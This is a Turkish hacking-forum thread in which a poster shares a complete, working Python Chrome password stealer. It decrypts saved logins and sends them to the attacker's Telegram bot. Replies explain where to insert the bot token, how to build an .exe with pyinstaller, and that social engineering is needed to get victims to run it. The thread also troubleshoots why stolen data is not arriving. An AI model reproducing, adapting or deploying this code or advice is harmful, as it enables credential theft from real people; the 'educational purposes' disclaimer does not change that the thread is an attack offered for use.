Python, stealer mantığındaki uygulamalar için pek mantıklı bir tercih değil. Exe haline getirebilmek için içine küçük bir yorumlayıcı ve paketleri tıkıştırmak gerekiyor. Verdiğiniz örnek kodu build edince bile 3.5 mb bir dosya oluştu. Bu hali ile av uygulamalarının vik vik öteceğini düşünürsek kodu biraz daha modifiye edersek toplam boyut dahada büyüyecektir.
Birincisi python dosyasını yutturmak için hedefte python yüklü artıdan gerekli kütüphanelerin de yüklü olması lazım. Kimsenin senin kadar şey olmadığını düşünürsek bu neredeyse imkansız. İkincisi anlaşılan sosyal mühendislik hakkında bir halt bilmiyorsun o konuyu araştırmanı tavsiye ederim. Ben sana hedefe direkt exe haline çevir sonra bu exe dosyasını at demiyorum milyon tane yöntem var uygun olanı seçip uygulayabilirsin. Bu konunun daha fazla uzamaması için sana verdiğim son cevap.
"şey olmadığını düşünürsek" mi? Şey ne?
öncelikle elinize saplık bu kodlarda hangi bölümlere CHAT ID ve TOKENİ ekleyeceğiz ve dosyayı .EXE formatına çevirmek yeterlimi bunları anlatırsanız sevinirim
Herkese merhaba, bugün sizlere python ile yazılmış olan chrome şifre grabberi paylaşacağım. Bu kod hedef bilgisayarda çalıştırıldığında hedefin chrome daki tüm kayıtlı şifrelerini telegram yoluyla hackera iletmeyi sağlar.
Daha önceki konularıma şuradan ulaşabilirsiniz: Python ile Hedefi Deli Etmek!Chrome Şifre Grabber:
Python ile RansomWare
NOT: ŞİFRELEME İŞLERİNDEN PEK ANLAMADIĞIM İÇİN KODUN YARISINI BAŞKA YERDEN ALDIM.
EĞİTİM AMAÇLIDIR SORUMLULUK KABUL ETMİYORUM
Python:import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil import requests def encryption_key(): local_state_yolu = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_state_yolu, "r", encoding="utf-8") as f: local_state = f.read() local_state = json.loads(local_state) key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) key = key[5:] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: iv = password[3:15] password = password[15:] cipher = AES.new(key, AES.MODE_GCM, iv) return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "" def send_telegram_document(bot_token, chat_id, document_path): url = f"https://api.telegram.org/bot{bot_token}/sendDocument" files = {'document': open(document_path, 'rb')} params = { "chat_id": chat_id, } try: response = requests.post(url, params=params, files=files) except: pass def main(): key = encryption_key() db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Login Data") filename = "ChromeData.db" shutil.copyfile(db_path, filename) db = sqlite3.connect(filename) cursor = db.cursor() cursor.execute( "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") credentials = [] for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5] if username or password: credentials.append({ "Origin URL": origin_url, "Action URL": action_url, "Username": username, "Password": password }) cursor.close() db.close() try: os.remove(filename) except: pass if credentials: bot_token = "BOT TOKENİNİZ" chat_id = "CHAT ID NİZ" document_path = "credentials.txt" with open(document_path, "w") as file: json.dump(credentials, file, indent=4) send_telegram_document(bot_token, chat_id, document_path) os.remove(document_path) if __name__ == "__main__": main()
Kodumuz bu kadardı, şimdi bakalım telegram adresimize istediğimiz bilgiler düşmüş mü?
ve gördüğünüz gibi hedef makinedeki kayıtlı tüm chrome şifrelerini çaldık. Kodu aynı şekilde başka tarayıcılar içinde uygun hale getirebilirsiniz. Konuyu kısa tutmak adına kodu açıklamıyacağım, fakat isteyen varsa dm den veya burdan yazarsa açıklarım.
Okuduğunuz için teşekkürler ...
Teşekkürler. Kodun en altında if credentialsın içinde nereye eklemeniz gerektiğini belirttim. Exe ye çevirme işlemine gelince ne yapacağınıza göre değişiklik gösterir. Birisine atacaksanız exe dosyası olarak atmanız en doğrusu tabii ki. Fakat sosyal mühendislik olmadan kimse yükleyip açmaz. Kısacası tamamen size kalmış.
cevap için teşekkür ederim gösterdiğiniz yerlere token ve ıd numaramı ekledim dosyayı .exe çevirdim tıkladım ama telegram botuma hiç bir bilgi gelmedi bu yüzden yazıyorum aslında hatam nedir?
Exeye doğru düzgün çevirdiğine emin misin bazen orada sıkıntı olabiliyor.
Teşekkürler
sağolasın
dosya dizinindeyken CMD içerisinde pyinstaller DOSYA İSMİ.PY ile çevirdim bir hata varmı?
Teşekkürler
teşekkürler bunu nasıl yapacağımı biraz araştırayım, her bilgi önemli teşekkür ederim vakit ayırdığınız için.
local stateden encryption keyi alıp şifreleri çözüp sana gönderiyor sqllite ile bukadar basit.
Eğer doğru uyguladıysanız normal şartlarda çalışması gerek, terminalden çalıştırır mısınız exe yi hata mesajına Bi bakalım
Teşekkürler
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.
